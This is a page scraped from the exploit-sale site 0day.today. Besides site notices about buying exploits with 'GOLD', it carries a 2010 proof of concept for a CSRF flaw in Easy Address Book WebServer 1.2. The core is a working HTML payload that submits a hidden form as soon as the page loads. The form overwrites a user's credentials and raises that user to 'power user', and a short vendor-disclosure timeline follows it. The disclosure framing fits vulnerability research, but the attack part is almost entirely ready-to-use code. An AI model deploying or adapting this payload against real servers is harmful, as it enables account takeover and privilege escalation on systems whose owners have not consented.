0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Easy Address book Webserver 1.2 CSRF
==================================== Easy Address book Webserver 1.2 CSRF ==================================== # Software : Easy Address Book WebServer 1.2 # Author : Markot # Date : May 25, 2010 # OS : Windows # Tested on : XP SP3 En (Virtual box) # Type of vuln : CSRF # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. #code <html> <body> <body onload="document.forms['Login'].submit();"> <form method="POST" name="Login" action="http://192.168.1.200:80/users_admin.ghp"> <input type="hidden" name="userid" value="3"/> <input type="hidden" name="username" value="corelanteam"/> <input type="hidden" name="password" value="corelanteam"/> <input type="hidden" name="email" value="markot@corelan.be"/> <input type="hidden" name="level" value="power user"/> <input type="hidden" name="state" value="Enable"/> <input type="hidden" name="add_user" value="Update"/> </form> </body> </html> Author/Vendor communication May 1 2010 : vendor contacted May 17 2010: reminder sent, no feedback from the vendor May 25 2010: Public disclosure # 0day.today [2024-12-25] #